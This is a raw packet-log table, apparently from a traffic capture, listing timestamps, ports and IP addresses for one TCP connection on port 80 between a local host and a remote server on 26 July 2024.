Jul 26, 2024 20:09:14.274364948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.274379969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.274413109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.274435043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.276072025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.276088953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.276129961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.278301001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.278317928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.278332949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.278372049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.278394938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.279953003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.279968023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.280006886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.280030012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.281425953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.281497955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.281549931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.281564951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.281599998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.281634092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.283744097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.283760071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.283814907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.284775972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.284791946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.284840107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.286545992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.286561966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.286576986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.286611080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.286648035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.288203001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.288218021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.288259983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.288306952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.289179087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.289232969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.289978981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.289994001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.290043116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.291549921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.291567087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.291580915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.291614056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.291635990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.293513060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.293531895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.293569088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.293590069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.311007023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.311079979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.311522961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.311537027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.311578989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.311600924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.312271118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.312285900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.312339067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.313550949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.313566923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.313610077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.314883947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.314899921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.314913034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.314948082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.314997911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.316134930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.316150904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.316206932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.317408085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.317423105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.317462921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.317501068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.318696976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.318711996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.318725109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.318738937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.318759918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.318798065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.319998980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.320014954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.320051908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.320086002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.321240902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.321257114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.321305990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.322433949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.322490931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.322527885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.322559118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.323626995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.323642969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.323657990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.323687077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.323720932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.324812889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.324829102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.324875116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.325812101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.325828075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.325840950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.325862885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.325908899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.326700926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.326716900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.326730967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.326756001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.326777935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.327583075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.327599049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.327641010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.328473091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.328496933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.328511953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.328528881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.328567982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.329349995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.329365015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.329379082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.329412937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.329430103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.330220938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.330235958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.330276966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.330297947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.331114054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.331130028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.331167936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.331188917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.332000971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.332016945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.332031012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.332076073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.332108974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.332916975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.332932949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.332946062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.332977057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.333013058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.333760977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.333776951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.333817005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.333837986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.334661961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.334677935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.334717035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.334753036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.335479975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.335495949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.335510015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.335531950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.335558891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.336350918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.336368084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.336407900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.336442947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.337121010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.337136984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.337171078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.337194920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.337845087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.337861061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.337898016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.337918997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.338607073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.338623047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.338637114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.338654995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.338691950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.339298010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.339313984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.339319944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.339396954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.340004921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.340020895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.340063095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.340749025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.340764999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.340778112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.340810061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.340830088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.341432095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.341448069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.341485977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.341506958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.342111111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.342166901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.342511892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.342529058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.342541933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.342564106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.342592001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.343199968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.343252897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.343266010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.343291044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.343314886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.343910933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.343926907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.343967915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.343995094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.344588995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.344604969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.344618082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.344644070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.344669104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.345273018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.345288038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.345325947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.345357895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.345927000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.345942974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.345957041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.345972061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.345979929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.346009016 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.346045017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.346915960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.346931934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.346945047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.346961021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.346972942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.346998930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.347034931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.347888947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.347904921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.347919941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.347944021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.347968102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.348830938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.348854065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.348869085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.348890066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.348933935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.349740982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.349757910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.349772930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.349786997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.349796057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.349838018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.350605011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.350620985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.350635052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.350650072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.350661993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.350682974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.350719929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.351470947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.351486921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.351500988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.351526976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.351562977 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.352325916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.352341890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.352355003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.352370977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.352380037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.352410078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.352442026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.353153944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.353212118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.384673119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.389653921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.570467949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.570552111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.570564985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.570584059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.570609093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.570635080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.571074009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.571091890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.571119070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.571145058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.571556091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.571576118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.571607113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.571626902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.572144032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.572160959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.572169065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.572230101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.573066950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573084116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573096991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573112011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573118925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.573167086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.573951960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573970079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573985100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.573998928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.573999882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.574027061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.574060917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.575239897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575257063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575272083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575288057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575290918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.575335026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.575797081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575813055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575829029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.575846910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.575882912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.576684952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.576703072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.576716900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.576738119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.576788902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.577562094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.577579975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.577594995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.577610970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.577614069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.577651978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.578305960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.578321934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.578336954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.578351974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.578355074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.578366041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.578391075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.578435898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.579272032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.579289913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.579305887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.579317093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.579322100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.579345942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.579370975 CEST	49704	80	192.168.2.5	85.28.47.31
